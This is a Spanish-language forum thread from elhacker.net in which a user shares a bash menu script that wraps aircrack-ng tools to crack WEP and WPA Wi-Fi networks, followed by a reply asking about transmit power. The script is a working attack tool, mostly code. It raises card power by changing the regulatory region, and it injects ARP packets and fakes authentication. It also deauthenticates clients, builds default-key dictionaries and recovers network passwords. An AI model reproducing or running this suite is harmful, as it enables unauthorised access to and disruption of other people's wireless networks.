Foro de elhacker.net

Seguridad Informática => Wireless en Linux => Mensaje iniciado por: RocKHounD en 11 Enero 2011, 00:12 am



Título: Script -- Suite Crack Wireless.
Publicado por: RocKHounD en 11 Enero 2011, 00:12 am
Hola a todos,

Hace tiempo cree el siguiente script que quiero compartir con vosotros, el codigo bueno... probablemente pueda depurarse casi en su total, aun asi funciona.
Esta creado para funcionar en BT4 con Chipset RTL.

La tercera linea del script puede modificarse para cambiarel chipset,
wlandecrypter esta implementado en el script aunque debe encontrarse en /usr/sbin.

Espero mejoras y demas.

Como comente a ChimoC he creado un blog para temas de scripting y de tecnicas de nivel medio alto en el que me gustaria que participaseis todos.

Seguire aportando aqui las cosas que me ronden la cabeza.

Un saludo,

Si no puedo poner este enlace, borrar unicamente esta parte pero no borreis mi aporte,

Gracias

http://btcode.blogspot.com (http://btcode.blogspot.com)


Citar
Código
  1. #!/bin/bash
  2. airmon-ng stop mon0 >> /dev/null
  3. clear
  4. RTL8187=`airmon-ng |grep "rtl" |awk '{print $1}'`
  5. echo [*] Cambiando la region de la tarjeta...
  6. iw reg set BO
  7. sleep 2
  8. echo [*] Cambiando la potencia maxima a la tarjeta
  9. iwconfig $RTL8187 txpower 30
  10. sleep 2
  11. echo [*] Habilitando Modo Monitor...
  12. sleep 2
  13. airmon-ng start $RTL8187 >> /dev/null
  14. echo [*] Modo Monitor Habilitado
  15. sleep 2
  16. echo [*] Falsficando Mac Address
  17. sleep 2
  18. echo [*] Mac Address Falsificada
  19. sleep 2
  20. echo
  21. echo
  22. clear
  23.  
  24. monitor=`ifconfig |grep "mon0" |awk '{print $1}'`
  25. mimac=00:11:22:33:44:55
  26.  
  27.  
  28. rm out*
  29. rm rep*
  30. rm *.xor
  31. rm *.diccionario
  32. rm *-request
  33. rm temp*
  34. while :
  35. do
  36. clear
  37. echo
  38. echo "1. Escanear todas las redes con cifrado WEP "
  39. echo "2. Escanear todas las redes con cifrado WPA "
  40. echo "3. Escanear una red en particular"
  41. echo "4. Lanzar Airodump-ng "
  42. echo "5. Lanzar Aireplay-ng modo Selectivo"
  43. echo "6. Lanzar Aireplay-ng modo inyectar ARP"
  44. echo "7. Lanzar Aireplay-ng modo asociacion falsa V1"
  45. echo "8. Lanzar Aireplay-ng modo asociacion falsa V2"
  46. echo "9. Lanzar Aireplay-ng modo asociacion falsa V3"
  47. echo "10. Lanzar Aireplay-ng para obtener el  PRGA"
  48. echo "11. Lanzar Aireplay-ng fragmentado para obtener PRGA"
  49. echo "12. Lanzar Packetforge-ng para crear un paquete ARP"
  50. echo "13. Lanzar Aireplay-ng para inyectar el paquete creado"
  51. echo "14. Lanzar Aireplay-ng para realizar una denegacion "
  52. echo "15. Crear un diccionario para redes WLAN_XX"
  53. echo "16. Lanzar Aircrack-ng para crackear la password"
  54. echo "17. Lanzar Aircrack-ng PTW para crackear la password"
  55. echo "18. Lanzar Aircrack-ng para crackear una password WLAN_XX"
  56. echo "19. Cambiar Mac Asociada"
  57. echo "20. Probar Si la tarjeta Inyecta correctamente"
  58. echo "21. Modificar la sensibilidad de la tarjeta"
  59. echo "22. Salir"
  60. echo ""
  61. echo "Elige una opcion"
  62. read opt
  63.  
  64. case $opt in
  65. 1) xterm -geometry 90x15+500+0 -fg yellow -bg black -hold -title "Esnifando paquetes" -e airodump-ng $monitor -a --encrypt wep -w temp &;;
  66. 2) xterm -geometry 90x15+500+0 -fg yellow -bg black -hold -title "Esnifando paquetes" -e airodump-ng $monitor -a --encrypt wpa -w temp &;;
  67. 3) cat  temp-01.csv | awk '{print $1,$20,$6}' >> temp-00001.csv;
  68. clear;
  69. cat temp-00001.csv;
  70. echo "Selecciona el Bssid";
  71. read macap;
  72. echo "Selecciona el Essid"
  73. read nombreap
  74. echo "Selecciona Canal";
  75. read canal;
  76. killall xterm;
  77. rm temp-*;;
  78. 4) xterm -hold -geometry 90x15+500+0 -fg yellow -bg black -title "Esnifando Paquetes" -e airodump-ng $monitor -a --bssid $macap -c $canal -w out &;;
  79. 5) xterm -hold -geometry 90x15+500+200 -fg yellow -bg black -title "Ataque Selectivo" -e aireplay-ng -2 -p 0841 -m 68 -n 86 -c FF:FF:FF:FF:FF:FF -b $macap -h $mimac $monitor &;;
  80. 6) xterm -hold -geometry 90x15+500+200 -fg yellow -bg black -title "Inyectando Arp" -e aireplay-ng -3 -b $macap -h $mimac $monitor &;;
  81. 7) xterm -geometry 90x15+0+0 -fg yellow -bg black -title "Asociando a $nombreap" -e aireplay-ng -1 0 -a $macap -h $mimac $monitor &;;
  82. 8) xterm -geometry 90x15+0+200 -fg yellow -bg black -title "Asociando a $nombreap" -e aireplay-ng -1 6000 -o 1 -q 10 -a $macap -h $mimac $monitor &;;
  83. 9) echo "Seleccina el numero de paquetes para la autenticacion";
  84. read num;
  85. xterm -geometry 90x15+0+200 -fg yellow -bg black -title "Asociando a $nombreap con $num paquetes" -e aireplay-ng -1 0 -a $macap -h $mimac -o $num $monitor &;;
  86. 10) xterm -geometry 90x15+500+400 -fg yellow -bg black -title "Creando XOR" -e aireplay-ng -4 -b $macap -h $mimac $monitor &;;
  87. 11) xterm -geometry 90x15+500+400 -fg yellow -bg black -title "Creando XOR" -e aireplay-ng -5 -b $macap -h $mimac $monitor &;;
  88. 12) packetforge-ng -0 -a $macap -h $mimac -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request &;;
  89. 13) xterm -geometry 90x15+500+400 -fg yellow -bg black -hold -title "Inyectando Paquete especial" -e aireplay-ng -2 -r arp-request -h $mimac $monitor &;;
  90. 14) xterm -geometry 90x15+0+200 -fg yellow -bg black -title "Deautenticando a $mimac" -e aireplay-ng -0 1 -a $macap -c $mimac $monitor &;;
  91. 15) xterm -e wlandecrypter $macap $nombreap $nombreap.diccionario;;
  92. 16) xterm -geometry 90x15+0+400 -fg yellow -bg black -hold -title "Crackeando $nombreap" -e aircrack-ng -a 1 *.cap;;
  93. 17) xterm -geometry 90x15+0+400 -fg yellow -bg black -hold -title "Crackeando $nombreap" -e aircrack-ng -a 1 -P 2 *.cap;;
  94. 18) xterm -geometry 90x15+0+400 -fg yellow -bg black -hold -title "Crackeando $nombreap" -e aircrack-ng -a 1 *.cap -w $nombreap.diccionario;;
  95. 19) echo "Escribe la nueva Mac Asociada";
  96. read mimac;;
  97. 20) xterm -geometry 90x15+0+400 -fg yellow -bg black -hold -title "Probando Inyeccion" -e aireplay-ng -9 -a $macap -e $nombreap $monitor &;;
  98. 21) echo "Selecciona la sensibilidad";
  99. echo "1M Mayor sensibilidad o 54M Mayor alcance";
  100. read sens;
  101. iwconfig $monitor rate $sens;;
  102. 22) exit 1;;
  103. *) echo "la opcion $opt no es valida, usa una entre 1 - 22";
  104. echo "Presiona enter para continuar"
  105. read enterKey;;
  106. esac
  107. done
  108.  


Título: Re: Script -- Suite Crack Wireless.
Publicado por: flacc en 9 Febrero 2011, 07:36 am
se agradece...

no tenia idea que se podia modificar la potencia de la tarjeta.. podrias comentar mas informacion al respecto de iwconfig $RTL8187 txpower 30 please... te lo agradeceria muchisimo...saludos


Título: Re: Script -- Suite Crack Wireless.
Publicado por: RocKHounD en 15 Febrero 2011, 00:36 am
Primero hay que cambiar la region de la tarjeta, si no, no te permite modificar el TX POWER,

solo lo he probado con las alfa 1W supongo que todas las de 1000mW tendrán las mismas caracteristicas.